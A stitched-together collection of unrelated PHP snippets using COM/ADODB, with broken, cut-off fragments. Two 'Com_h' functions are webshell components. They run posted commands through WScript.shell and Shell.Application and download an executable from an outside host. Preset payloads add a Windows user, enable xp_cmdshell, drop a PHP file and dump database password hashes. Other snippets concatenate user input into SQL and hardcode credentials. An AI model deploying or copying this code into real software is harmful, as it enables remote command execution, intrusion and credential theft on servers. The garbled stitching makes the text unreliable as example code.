function db_connect()
{
global $host,$user,$pwd,$dbname,$mssql_dmy,$cCodepage,$options, $ODBCString;
$connStrings = array();
if($_SESSION["MSSQLConnString"])
{
$connStrings[] = $_SESSION["SQLConnString"];
}
$connStrings[] = $ODBCString;
// SQLOLEDB provider
if($options=="SSPI")
$connStrings[] = "PROVIDER=SQLOLEDB;SERVER=".$host.";DATABASE=".$dbname.";Integrated Security=SSPI";
else
$connStrings[] = "PROVIDER=SQLOLEDB;SERVER=".$host.";UID=".$user.";PWD=".$pwd.";DATABASE=".$dbname;
// SQLNCLI provider
if($options=="SSPI")
$connStrings[] = "PROVIDER=SQLNCLI;SERVER=".$host.";DATABASE=".$dbname.";Integrated Security=SSPI";
else
$connStrings[] = "PROVIDER=SQLNCLI;SERVER=".$host.";UID=".$user.";PWD=".$pwd.";DATABASE=".$dbname;
// go thru connection strings one by one
$errorString = "";
foreach($connStrings as $connStr)
{
try {
$conn = new COM("ADODB.Connection",NULL,$cCodepage);
$conn->Open($connStr);
$rs=$conn->Execute("select convert(datetime,'2000-11-22',121)");
$str=$rs->Fields[0]->Value;
$y=strpos($str,"2000");
$m=strpos($str,"11");
$d=strpos($str,"22");
if($y<$m && $m<$d)
$mssql_dmy="ymd";
if($d<$m && $m<$y)
$mssql_dmy="dmy";
$_SESSION["MSSQLConnString"] = $connStr;
return $conn;
} catch(com_exception $e)
{
$errorString .= "<br>".$e->getMessage();
}
}
trigger_error($errorString, E_USER_ERROR);
}
function db_connect()
{
global $host, $user, $pwd, $dbname, $mssql_dmy, $cCodepage;
$connstr = "PROVIDER=SQLOLEDB;SERVER=" . $host . ";UID=" . $user . ";PWD=" . $pwd . ";DATABASE=" . $dbname;
try {
$conn = new COM("ADODB.Connection", NULL, $cCodepage);
$conn->Open($connstr);
$rs = $conn->Execute("select convert(datetime,'2000-11-22',121)");
$str = $rs->Fields[0]->Value;
$y = strpos($str, "2000");
$m = strpos($str, "11");
$d = strpos($str, "22");
if ($y < $m && $m < $d) {
$mssql_dmy = "ymd";
}
if ($d < $m && $m < $y) {
$mssql_dmy = "dmy";
}
} catch (com_exception $e) {
trigger_error($e->getMessage(), E_USER_ERROR);
}
return $conn;
}
function _query($sql, $inputarr = false)
{
$dbc = $this->_connectionID;
$false = false;
// return rs
if ($inputarr) {
if (!empty($this->charPage)) {
$oCmd = new COM('ADODB.Command', null, $this->charPage);
} else {
$oCmd = new COM('ADODB.Command');
}
$oCmd->ActiveConnection = $dbc;
$oCmd->CommandText = $sql;
$oCmd->CommandType = 1;
// Map by http://msdn.microsoft.com/library/default.asp?url=/library/en-us/ado270/htm/mdmthcreateparam.asp
// Check issue http://bugs.php.net/bug.php?id=40664 !!!
while (list(, $val) = each($inputarr)) {
$type = gettype($val);
$len = strlen($val);
if ($type == 'boolean') {
$this->adoParameterType = 11;
} else {
if ($type == 'integer') {
$this->adoParameterType = 3;
} else {
if ($type == 'double') {
$this->adoParameterType = 5;
} elseif ($type == 'string') {
$this->adoParameterType = 202;
} else {
if ($val === null || !defined($val)) {
$len = 1;
} else {
$this->adoParameterType = 130;
}
}
}
}
// name, type, direction 1 = input, len,
$p = $oCmd->CreateParameter('name', $this->adoParameterType, 1, $len, $val);
$oCmd->Parameters->Append($p);
}
$p = false;
$rs = $oCmd->Execute();
$e = $dbc->Errors;
if ($dbc->Errors->Count > 0) {
return $false;
}
return $rs;
}
$rs = @$dbc->Execute($sql, $this->_affectedRows, $this->_execute_option);
if ($dbc->Errors->Count > 0) {
return $false;
}
if (!$rs) {
return $false;
}
if ($rs->State == 0) {
$true = true;
return $true;
// 0 = adStateClosed means no records returned
}
return $rs;
}
$Bot = "Sogou";
}
if (strpos($agent, "yahoo") > -1) {
$Bot = "Yahoo!";
}
if (strpos($agent, "msn") > -1) {
$Bot = "MSN";
}
if (strpos($agent, "ia_archiver") > -1) {
$Bot = "Alexa";
}
if (strpos($agent, "iaarchiver") > -1) {
$Bot = "Alexa";
}
if (strpos($agent, "sohu") > -1) {
$Bot = "Sohu";
}
if (strpos($agent, "sqworm") > -1) {
$Bot = "AOL";
}
if (strpos($agent, "yodaoBot") > -1) {
$Bot = "Yodao";
}
if (strpos($agent, "iaskspider") > -1) {
$Bot = "Iask";
}
$conn = new COM('ADODB.Connection') or die('can not start Active X Data Objects');
$conn->Open("DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" . realpath("bot.mdb"));
$shijian = date("Y-m-d h:i:s", time());
$rs = $conn->Execute("insert into bot (bot,shijian,url,serverip) values ('{$Bot}','{$shijian}','{$GetLocationURL}','{$serverip}')");
function Com_h()
{
$object = isset($_GET['o']) ? $_GET['o'] : 'adodb';
print <<<END
<div class="actall"><a href="?s=h&o=adodb">[ADODB.Connection]</a>
<a href="?s=h&o=wscript">[WScript.shell]</a>
<a href="?s=h&o=application">[Shell.Application]</a>
<a href="?s=h&o=downloader">[Downloader]</a></div>
<form method="POST" name="hform" id="hform" action="?s=h&o={$object}">
END;
if ($object == 'downloader') {
$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://blackbap.org/a.exe';
$Com_dpath = isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(__FILE__) . '/a.exe');
print <<<END
<div class="actall">超连接 <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
<div class="actall">下载到 <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
<div class="actall"><input value="下载" type="submit" style="width:80px;"></div></form>
END;
if (!empty($_POST['durl']) && !empty($_POST['dpath'])) {
echo '<div class="actall">';
$contents = @file_get_contents($_POST['durl']);
if (!$contents) {
echo '无法下载数据';
} else {
echo File_Write($_POST['dpath'], $contents, 'wb') ? '下载成功' : '下载失败';
}
echo '</div>';
}
} elseif ($object == 'wscript') {
$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir';
print <<<END
<div class="actall">执行CMD命令 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form>
END;
if (!empty($_POST['cmd'])) {
echo '<div class="actall">';
$shell = new COM('wscript');
$exe = @$shell->exec("cmd.exe /c " . $cmd);
$out = $exe->StdOut();
$output = $out->ReadAll();
echo '<pre>' . $output . '</pre>';
@$shell->Release();
$shell = NULL;
echo '</div>';
}
} elseif ($object == 'application') {
$run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe';
$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\\boot.ini d:\\a.txt';
print <<<END
<div class="actall">程序路径 <input type="text" name="run" value="{$run}" style="width:600px;"></div>
<div class="actall">命令参数 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form>
END;
if (!empty($_POST['run'])) {
echo '<div class="actall">';
$shell = new COM('application');
echo @$shell->ShellExecute($run, '/c ' . $cmd) == '0' ? '执行成功' : '执行失败';
@$shell->Release();
$shell = NULL;
echo '</div>';
}
} elseif ($object == 'adodb') {
$string = isset($_POST['string']) ? $_POST['string'] : '';
$sql = isset($_POST['sql']) ? $_POST['sql'] : '';
print <<<END
<script language="javascript">
function hFull(i){
\tif(i==0 || i==5) return false;
\tStr = new Array(12);
\tStr[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\\db.mdb";
\tStr[2] = "Driver={Sql Server};Server=,1433;Database=DB;Uid=sa;Pwd=**";
\tStr[3] = "Driver={MySql};Server=;Port=3306;Database=DB;Uid=root;Pwd=**";
\tStr[4] = "Provider=MSDAORA.1;Password=密码;User ID=帐号;Data Source=服务名;Persist Security Info=True;";
\tStr[6] = "SELECT * FROM [TableName] WHERE ID<10";
\tStr[7] = "INSERT INTO [TableName](usr,psw) VALUES('yoco','pwd')";
\tStr[8] = "DELETE FROM [TableName] WHERE ID=1";
\tStr[9] = "UPDATE [TableName] SET USER='******' WHERE ID=1";
\tStr[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
\tStr[11] = "DROP TABLE [TableName]";
\tStr[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
\tStr[13] = "ALTER TABLE [TableName] DROP COLUMN PASS";
\tif(i<=4){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];}
\treturn true;
}
</script>
<div class="actall">连接字符串 <input type="text" name="string" id="string" value="{$string}" style="width:526px;">
<select onchange="return hFull(options[selectedIndex].value)">
<option value="0" selected>--连接示例--</option>
<option value="1">Access连接</option>
<option value="2">MsSql连接</option>
<option value="3">MySql连接</option>
<option value="4">Oracle连接</option>
<option value="5">--SQL语法--</option>
<option value="6">显示数据</option>
<option value="7">添加数据</option>
<option value="8">删除数据</option>
<option value="9">修改数据</option>
<option value="10">建数据表</option>
<option value="11">删数据表</option>
<option value="12">添加字段</option>
<option value="13">删除字段</option>
</select></div>
<div class="actall">SQL命令 <input type="text" name="sql" id="sql" value="{$sql}" style="width:650px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div>
</form>
END;
if (!empty($string)) {
echo '<div class="actall">';
$shell = new COM('adodb');
@$shell->Open($string);
$result = @$shell->Execute($sql);
$count = $result->Fields->Count();
for ($i = 0; $i < $count; $i++) {
$Field[$i] = $result->Fields($i);
}
echo $result ? $sql . ' 执行成功<br>' : $sql . ' 执行失败<br>';
if (!empty($count)) {
while (!$result->EOF) {
for ($i = 0; $i < $count; $i++) {
echo htmlspecialchars($Field[$i]->value) . '<br>';
}
@$result->MoveNext();
}
}
$shell->Close();
@$shell->Release();
$shell = NULL;
echo '</div>';
}
}
return true;
}
function _query($sql, $inputarr = false)
{
$dbc = $this->_connectionID;
$false = false;
if ($inputarr) {
if (!empty($this->charPage)) {
$oCmd = new COM('ADODB.Command', null, $this->charPage);
} else {
$oCmd = new COM('ADODB.Command');
}
$oCmd->ActiveConnection = $dbc;
$oCmd->CommandText = $sql;
$oCmd->CommandType = 1;
foreach ($inputarr as $val) {
$this->adoParameterType = 130;
$p = $oCmd->CreateParameter('name', $this->adoParameterType, 1, strlen($val), $val);
$oCmd->Parameters->Append($p);
}
$p = false;
$rs = $oCmd->Execute();
$e = $dbc->Errors;
if (0 < $dbc->Errors->Count) {
return $false;
}
return $rs;
}
$rs = @$dbc->Execute($sql, $this->_affectedRows, $this->_execute_option);
if (0 < $dbc->Errors->Count) {
return $false;
}
if (!$rs) {
return $false;
}
if ($rs->State == 0) {
$true = true;
return $true;
}
return $rs;
}
function &_query($sql,$inputarr=false)
{
$dbc = $this->_connectionID;
$false = false;
// return rs
if ($inputarr) {
if (!empty($this->charPage))
$oCmd = new COM('ADODB.Command',null,$this->charPage);
else
$oCmd = new COM('ADODB.Command');
$oCmd->ActiveConnection = $dbc;
$oCmd->CommandText = $sql;
$oCmd->CommandType = 1;
foreach($inputarr as $val) {
// name, type, direction 1 = input, len,
$this->adoParameterType = 130;
$p = $oCmd->CreateParameter('name',$this->adoParameterType,1,strlen($val),$val);
//print $p->Type.' '.$p->value;
$oCmd->Parameters->Append($p);
}
$p = false;
$rs = $oCmd->Execute();
$e = $dbc->Errors;
if ($dbc->Errors->Count > 0) return $false;
return $rs;
}
$rs = @$dbc->Execute($sql,$this->_affectedRows, $this->_execute_option);
if ($dbc->Errors->Count > 0) return $false;
if (! $rs) return $false;
if ($rs->State == 0) {
$true = true;
return $true; // 0 = adStateClosed means no records returned
}
return $rs;
}
function BASIS()
{
$conn = new COM("ADODB.Connection") or die("Kan ADODB niet gebruiken");
$conn->Provider = "OraOLEDB.Oracle";
$conn->ConnectionString = "Data Source=GEO;User Id=gbi; Password=zomer;";
$conn->Open();
$sql_stmt = " SELECT SDO_UTIL.TO_WKTGEOMETRY(SDO_AGGR_MBR(shape)) FROM AB_HIST_GEMEENTEGRENS_V";
$p = "";
$Recordset = $conn->Execute($sql_stmt);
while (!$Recordset->EOF) {
$res = $Recordset->Fields[0]->Value;
$lengte = strlen($res);
$pol = strpos($res, "POLYGON");
if ($pol >= 0) {
$coord = substr($res, $pol + 10, $lengte - 10 - 2);
}
//print ($coord);
//print ("<BR>");
$Recordset->MoveNext();
}
$p = $coord . "|";
$Recordset->Close();
unset($Recordset);
$sql_stmt = "SELECT SDO_UTIL.TO_WKTGEOMETRY(shape) FROM AB_HIST_GEMEENTEGRENS_V";
$Recordset = $conn->Execute($sql_stmt);
while (!$Recordset->EOF) {
$res = $Recordset->Fields[0]->Value;
//print ($res . "<BR><BR>");
$lengte = strlen($res);
$pol = strpos($res, "POLYGON");
if ($pol >= 0) {
$coord = substr($res, $pol + 10, $lengte - 10 - 2);
}
$p = $p . $coord . "|";
$Recordset->MoveNext();
}
$Recordset->Close();
unset($Recordset);
$conn->Close();
unset($conn);
CREATEPDF($p);
/*
$sGeo = explode("|", $p);
$tokens = explode(",", $sGeo[0]);
$sMin = explode(" ", $tokens[0]);
$sMax = explode(" ", $tokens[2]);
$sMinX = $sMin[0];
$sMinY = $sMin[1];
print ("sMinX = " . $sMin[0]);
print ("sMinY = " . $sMin[1]);
for ($iRecord = 1; $iRecord < (count($sGeo) - 1); $iRecord++) {
$tokens = explode(",", $sGeo[$iRecord]);
print ($sGeo[$iRecord]);
print ("<BR><BR>");
$point = array();
for ($gRecord = 0; $gRecord < count($tokens); $gRecord++) {
$sPunt = explode(" ", $tokens[$gRecord]);
if ($gRecord == 0) {
$sX = $sPunt[0] - $sMinX;
$sY = $sPunt[1] - $sMinY;
print ("gRecord = 0 ");
print ($sX * 1000 / 350000);
print (" ");
print ($sY * 1000 / 350000);
print ("<BR>");
$point[$gRecord] = ($sX * 1000 / 350000);
$point[$gRecord + 1] = ($sY * 1000 / 350000);
}
elseif ($gRecord == (count($tokens) - 1)) {
$sX = $sPunt[1] - $sMinX;
$sY = $sPunt[2] - $sMinY;
print ("gRecord = ubound(tokens) ");
print ($sX * 1000 / 350000);
print (" ");
print ($sY *1000 / 350000);
print ("<BR>");
$point[$gRecord] = ($sX * 1000 / 350000);
$point[$gRecord + 1] = ($sY * 1000 / 350000);
}
else {
$sX = $sPunt[1] - $sMinX;
$sY = $sPunt[2]- $sMinY;
print ($sX * 1000 / 350000);
print (" ");
print ($sY *1000 / 350000);
print ("<BR>");
$point[$gRecord] = ($sX * 1000 / 350000);
$point[$gRecord + 1] = ($sY * 1000 / 350000);
}
}
unset($point);
}
*/
}
function Com_h()
{
$object = isset($_GET['o']) ? $_GET['o'] : 'adodb';
$com = array("adodb" => "ADODB.Connection", "wscript" => "WScript.shell", "application" => "Shell.Application");
print <<<END
<div class="actall"><a href="?s=h&o=adodb">[ADODB.Connection]</a>
<a href="?s=h&o=wscript">[WScript.shell]</a>
<a href="?s=h&o=application">[Shell.Application]</a></div>
<div class="actall" style="height:200px;">
<form method="POST" name="hform" id="hform" action="?s=h&o={$object}"><br>
END;
$shell = new COM($com[$object]);
if ($object == 'wscript') {
$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir';
$cmdpath = isset($_POST['cmdpath']) ? $_POST['cmdpath'] : 'c:\\windows\\system32\\cmd.exe';
print <<<END
 cmdpath:<input type="text" name="cmdpath" value="{$cmdpath}" style="width:600px;"><br>
command:<input type="text" name="cmd" value="{$cmd}" style="width:600px;">
<input class="bt" type="submit" value="execute"></form><br>
END;
if (!empty($_POST['cmd'])) {
$exe = @$shell->exec("{$cmdpath} /c " . $cmd);
$out = $exe->StdOut();
$output = $out->ReadAll();
echo '<pre>' . $output . '</pre>';
}
} elseif ($object == 'application') {
$run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe';
$cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\\windows\\php.ini c:\\php.ini';
print <<<END
Path:<br><input type="text" name="run" value="{$run}" style="width:600px;">
<br><br>Command argv:<br><input type="text" name="cmd" value="{$cmd}" style="width:600px;">
<br><br><input class="bt" type="submit" value="execute"></form><br>
END;
if (!empty($_POST['run'])) {
echo @$shell->ShellExecute($run, '/c ' . $cmd) == '0' ? 'Done' : 'Faild';
}
} elseif ($object == 'adodb') {
$string = isset($_POST['string']) ? $_POST['string'] : '';
$sql = isset($_POST['sql']) ? $_POST['sql'] : '';
print <<<END
<script language="javascript">
function hFull(i){
\tif(i==0 || i==10) return false;
\tStr = new Array(12);
\tStr[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\\db.mdb;Jet OLEDB:Database Password=***";
\tStr[2] = "Driver={Sql Server};Server=localhost,1433;Database=DbName;Uid=sa;Pwd=sa";
\tStr[3] = "Driver={MySql};Server=localhost;Port=3306;Database=DbName;Uid=root;Pwd=root";
\tStr[4] = "Provider=OraOLEDB.Oracle.1;User ID=oracle;Password=oracle;Data Source=ORACLE;Persist Security Info=True;";
Str[5] = "driver={IBM db2 odbc DRIVER};database=mydb;hostname=localhost;port=50000;protocol=TCPIP;uid=root; pwd=pass";
Str[6] = "DRIVER={POSTGRESQL};SERVER=127.0.0.1;DATABASE=PostGreSQL;UID=postgresql;PWD=123456;";
Str[7] = "Dsn='';Driver={INFORMIX 3.30 32 BIT};Host=myHostname;Server=myServerName;Service=myServiceName;Protocol=olsoctcp;Database=myDbName;UID=myUsername;PWD=myPassword";
\tStr[8] = "DSN=mydns;Uid=username;Pwd=password";
Str[9] = "FILEDNS=c:\\\\path\\\\db.dsn;Uid=username;Pwd=password";
Str[11] = "SELECT * FROM [TableName] WHERE ID<100";
\tStr[12] = "INSERT INTO [TableName](USER,PASS) VALUES('b4che10r','mypass')";
\tStr[13] = "UPDATE [TableName] SET USER='******' WHERE ID=100";
\tStr[14] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
\tStr[15] = "DROP TABLE [TableName]";
\tStr[16] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
Str[17] = "select shell('c:\\windows\\system32\\cmd.exe /c net user b4che10r abc123 /add');";
Str[18] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
Str[19] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
Str[20] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
Str[21] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll')";
Str[22] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll')";
Str[23] = "Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo '<?php phpinfo();?>' > c:\\info.php';";
\tStr[24] = "sp_makewebtask @outputfile='d:\\\\web\\\test.php',@charset=gb2312,@query='select test';";
Str[25] = "Exec master.dbo.xp_cmdshell 'ver';";
Str[26] = "Select Name FROM Master..SysDatabases;";
Str[27] = "select name from sysobjects where type='U';";
Str[28] = "Select Name from SysColumns Where id=Object_Id('TableName');";
Str[29] = "select username,password from dba_users;";
Str[30] = "select TABLE_NAME from all_tables;";
Str[31] = "desc admin;";
Str[32] = "grant connect,resource,dba to user_name;";
Str[33] = "select datname from pg_database;";
Str[34] = "select relname from pg_stat_user_tables;";
Str[35] = "\\\\d table_name";
Str[36] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));";
Str[37] = "\\\\! uname -a";
Str[38] = "select schemaname from syscat.schemata;";
Str[39] = "select name from sysibm.systables;";
Str[40] = "select colname from syscat.columns where tabname='table_name';";
Str[41] = "db2 get db cfg for db_name;";
Str[42] = "select name from sysdatabases;";
Str[43] = "select tabname from systables where tabid=n;";
Str[44] = "select tabname,colname,owner,coltype from syscolumns join systables on syscolumns.tabid = systables.tabid;";
Str[45] = "select username,usertype,password from sysusers;";
if(i<=9){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];}
\treturn true;
}
</script>
conn strings:<br> <input type="text" name="string" id="string" value="{$string}" style="width:800px;">
<select onchange="return hFull(options[selectedIndex].value)">
<option value="0" selected>--select range--</option>
<option value="1">Access</option>
<option value="2">MsSql</option>
<option value="3">MySql</option>
<option value="4">Oracle</option>
<option value="5">DB2</option>
<option value="6">PostGreSQL</option>
<option value="7">Informix</option>
<option value="8">DSN</option>
<option value="9">FILEDSN</option>
<option value="10">--sql statement--</option>
<option value="11">show data</option>
<option value="12">insert data</option>
<option value="13">update data</option>
<option value="14">create table</option>
<option value="15">drop table</option>
<option value="16">add column</option>
<option value="17">access shell()</option>
<option value="18">add xp_cmdsehll(sql2005)</option>
<option value="19">add oacreate(sql2005)</option>
<option value="20">add openrowset(sql2005)</option>
<option value="21">add xp_cmdsehll(sql2000)</option>
<option value="22">add oacreate(sql2000)</option>
<option value="23">oamethod exec</option>
<option value="24">sp_makewebtask</option>
<option value="25">xp_cmdshell</option>
<option value="26">databases(sql)</option>
<option value="27">tables(sql)</option>
<option value="28">columns(sql)</option>
<option value="29">hashes(oracle)</option>
<option value="30">tables(oracle)</option>
<option value="31">columns(oracle)</option>
<option value="32">grant(oracle)</option>
<option value="33">databases(pgsql)</option>
<option value="34">tables(pgsql)</option>
<option value="35">columns(pgsql)</option>
<option value="36">pg_hba.conf(pgsql)</option>
<option value="37">os-command(pgsql)</option>
<option value="38">databases(db2)</option>
<option value="39">tables(db2)</option>
<option value="40">columns(db2)</option>
<option value="41">db config(db2)</option>
<option value="42">databases(informix)</option>
<option value="43">tables(informix)</option>
<option value="44">columns(informix)</option>
<option value="45">hashes(informix)</option>
</select>
<br><br>SQL Commnad:<br> <input type="text" name="sql" id="sql" value="{$sql}" style="width:800px;">
<input class="bt" type="submit" value="execute">
</form><br>
END;
if (!empty($string)) {
@$shell->Open($string);
$result = @$shell->Execute($sql);
$count = $result->Fields->Count();
for ($i = 0; $i < $count; $i++) {
$Field[$i] = $result->Fields($i);
}
echo $result ? $sql . ' Done<br>' : $sql . ' Faild<br>';
if (!empty($count)) {
while (!$result->EOF) {
for ($i = 0; $i < $count; $i++) {
echo $Field[$i]->value . '<br>';
}
@$result->MoveNext();
}
}
$shell->Close();
}
}
$shell = NULL;
echo '</div>';
return true;
}
public function pi(Request $request)
{
$data = $request->all();
$connection_id = $data['connection_id'];
$tagset_id = $data['tagset_id'];
$cal_method = $data['cal_method'];
$date_begin = $data['date_begin'];
$date_end = $data['date_end'];
$update_db = $data['update_db'];
$int_connection = IntConnection::where(['ID' => $connection_id])->select('SERVER', 'USER_NAME', 'PASSWORD')->first();
$server = $int_connection->SERVER;
$username = $int_connection->USER_NAME;
$password = $int_connection->PASSWORD;
$intTagSet = IntTagSet::where(['ID' => $tagset_id])->select('TAGS')->first();
$ptags = $intTagSet->TAGS;
$str = "";
if ($update_db && $cal_method == "all") {
return response()->json("<font color='red'>Not allow inport data with method '<b>All</b>'</font>");
}
$tagcondition = "";
$tags = explode("\n", $ptags);
foreach ($tags as $tag) {
if ($tag) {
$tagcondition .= ($tagcondition ? " or " : "") . "tag='{$tag}'";
}
}
if ($cal_method == "max" || $cal_method == "min") {
$sql = "SELECT tt.tag,tt.TIME,tt.value\n\t\t\t\t\tFROM [piarchive].[picomp] tt\n\t\t\t\t\tinner join\n\t\t\t\t\t(\n\t\t\t\t\tSELECT tag tagx,{$cal_method}(value) mvalue\n\t\t\t\t\tFROM [piarchive].[picomp]\n\t\t\t\t\tWHERE ({$tagcondition})\n\t\t\t\t\tAND time BETWEEN '{$date_begin}' AND '{$date_end}' group by tag\n\t\t\t\t\t) grouped on tt.tag=grouped.tagx and tt.value=grouped.mvalue\n\t\t\t\t\tWHERE ({$tagcondition})\n\t\t\t\t\tAND value is not null\n\t\t\t\t\tAND time BETWEEN '{$date_begin}' AND '{$date_end}'";
} else {
if ($cal_method == "first" || $cal_method == "last") {
$func = $cal_method == "first" ? "min" : "max";
$sql = "SELECT tt.tag,tt.TIME,tt.value\n\t\t\t\t\t\tFROM [piarchive].[picomp] tt\n\t\t\t\t\t\tinner join\n\t\t\t\t\t\t(\n\t\t\t\t\t\tSELECT tag tagx,{$func}(time) mtime\n\t\t\t\t\t\tFROM [piarchive].[picomp]\n\t\t\t\t\t\tWHERE ({$tagcondition})\n\t\t\t\t\t\tAND time BETWEEN '{$date_begin}' AND '{$date_end}' group by tag\n\t\t\t\t\t\t) grouped on tt.tag=grouped.tagx and tt.time=grouped.mtime\n\t\t\t\t\t\tWHERE ({$tagcondition})\n\t\t\t\t\t\tAND value is not null\n\t\t\t\t\t\tAND time BETWEEN '{$date_begin}' AND '{$date_end}'";
} else {
if ($cal_method == "average") {
$sql = "SELECT tag, max(TIME) TIME, avg(value) value\n\t\t\t\t\t\tFROM picomp\n\t\t\t\t\t\tWHERE ({$tagcondition}) AND value is not null AND time BETWEEN '{$date_begin}' AND '{$date_end}'\n\t\t\t\t\t\tgroup by tag";
} else {
$sql = "SELECT tag, TIME, value\n\t\t\t\t\t\tFROM picomp\n\t\t\t\t\t\tWHERE ({$tagcondition}) AND value is not null AND time BETWEEN '{$date_begin}' AND '{$date_end}'";
}
}
}
$update_db = 'No';
if ($update_db) {
$supdate_db = 'Yes';
}
$str .= " <b>Import PI data</b><br>";
$str .= " Server: <b>" . $server . "</b><br>";
$str .= " Data method: <b>" . $cal_method . "</b><br>";
$str .= " Update database: <b>" . $supdate_db . "</b><br>";
$str .= " From time: <b>" . $data['date_begin'] . "</b><br>";
$str .= " To time: <b>" . $data['date_end'] . "</b><br><br>";
$connection = new \COM("ADODB.Connection") or die("Cannot start ADO");
$str .= " Open connection " . date('H:i:s') . "<br>";
$connection->Open("Initial Catalog=piarchive;\n\t\t\t\tData Source='localhost';User ID =root;Password='';");
$str .= " Begin command " . date('H:i:s') . "<br>";
$result_set = $connection->Execute($sql);
$result_count = 0;
$labels = array();
$str .= " Begin fetch data " . date('H:i:s') . "<br><br>";
$str .= " <table><tr><td><b>Tag</b></td><td><b>Date/time</b></td><td><b>Value</b></td><td><b>Code</b></td><td><b>Status</b></td><td><b>Command</b></td></tr>";
while (!$result_set->EOF) {
$impSQL = "";
$hasError = false;
$statusCode = "Y";
$err = "";
$tagID = $result_set->fields[0]->value;
$date = $result_set->fields[1]->value;
$value = $result_set->fields[2]->value;
$r_t = int_tag_mapping::where(['TAG_ID' => $tagID])->select('*')->first();
if ($update_db) {
if (count($r_t) <= 0) {
$hasError = true;
$statusCode = "NG";
$err = "Tag mapping not found";
} else {
foreach ($r_t as $r) {
$table_name = strtoupper($r[TABLE_NAME]);
$column_name = strtoupper($r[COLUMN_NAME]);
$cc = DB::statement("SELECT TABLE_NAME FROM `INFORMATION_SCHEMA`.`TABLES` WHERE TABLE_SCHEMA='{$db_schema}' and `TABLE_NAME`='{$table_name}' limit 1");
if (!$cc) {
$hasError = true;
$statusCode = "NT";
$err = "Table not found ({$table_name})";
} else {
$cc = DB::statement("SELECT COLUMN_NAME FROM `INFORMATION_SCHEMA`.`COLUMNS` WHERE TABLE_SCHEMA='{$db_schema}' and `TABLE_NAME`='{$table_name}' and COLUMN_NAME='{$column_name}' limit 1");
if (!$cc) {
$hasError = true;
$statusCode = "NC";
$err = "Column not found ({$column_name})";
}
}
if (!$hasError) {
$objIDField = $this->getObjectIDFiledName($table_name);
$sF = "";
$sV = "";
$sWhere = "{$objIDField}={$r['OBJECT_ID']} and OCCUR_DATE=DATE('{$date}')";
if (substr($table_name, 0, 12) == "ENERGY_UNIT_") {
$sWhere .= " and FLOW_PHASE={$r['FLOW_PHASE']}";
$sF .= ",FLOW_PHASE";
$sV .= ",{$r['FLOW_PHASE']}";
}
if ($table_name == "ENERGY_UNIT_DATA_ALLOC") {
$sWhere .= " and ALLOC_TYPE={$r['ALLOC_TYPE']}";
$sF .= ",ALLOC_TYPE";
$sV .= ",{$r['ALLOC_TYPE']}";
}
$tmp = DB::statement("select ID from `{$table_name}` where {$sWhere} limit 1");
if ($tmp) {
$sSQL = "update `{$table_name}` set `{$column_name}`='{$value}' where ID={$rID->ID}";
$sSQL = str_replace("''", "null", $sSQL);
$impSQL .= ($impSQL ? "<bt>" : "") . $sSQL;
if ($update_db) {
DB::update($sSQL) or $html .= "<td>" . mysql_error() . "</td>";
$tags_override++;
}
} else {
$sSQL = "insert into `{$table_name}`(`{$objIDField}`,OCCUR_DATE,`{$column_name}`{$sF}) values({$r['OBJECT_ID']},'{$date}','{$value}'{$sV})";
$sSQL = str_replace("''", "null", $sSQL);
$impSQL .= ($impSQL ? "<bt>" : "") . $sSQL;
if ($update_db) {
DB::insert($sSQL) or $html .= "<td>" . mysql_error() . "</td>";
$tags_addnew++;
}
}
$tags_loaded++;
}
}
}
}
$str .= " <tr><td>" . $result_set->fields[0]->value . '</td><td>' . $result_set->fields[1]->value . '</td><td>' . $result_set->fields[2]->value . "</td><td>{$statusCode}</td><td>{$err}</td><td>{$impSQL}</td></tr>";
$result_count = $result_count + 1;
$result_set->MoveNext();
}
$str .= " </table><br>";
$str .= " Close connection " . date('H:i:s') . "<br>";
$str .= " <br />The number of records retrieved is: " . $result_count . "<br /><br />";
$result_set->Close();
// optional
$connection->Close();
// optional
$str .= " Finished " . date('H:i:s') . "<br>";
return response()->json($str);
}
<?php
checkauthentication();
$err = false;
extract($_POST);
$xmenu_p = xmenu_id($p);
$p_next = $xmenu_p->parent;
$th = $_SESSION['xth'];
if (isset($form)) {
if ($err != true) {
$kdsatker_input = $_REQUEST['kdsatker'];
if ($kdsatker_input != '') {
$conn = new COM("ADODB.Connection");
$dirData = "c:\\xampp\\htdocs\\sireva\\file_dipa\\" . $kdsatker_input . "\\";
$conn->Open("Provider=vfpoledb.1;Data Source={$dirData};Collating Sequence=Machine");
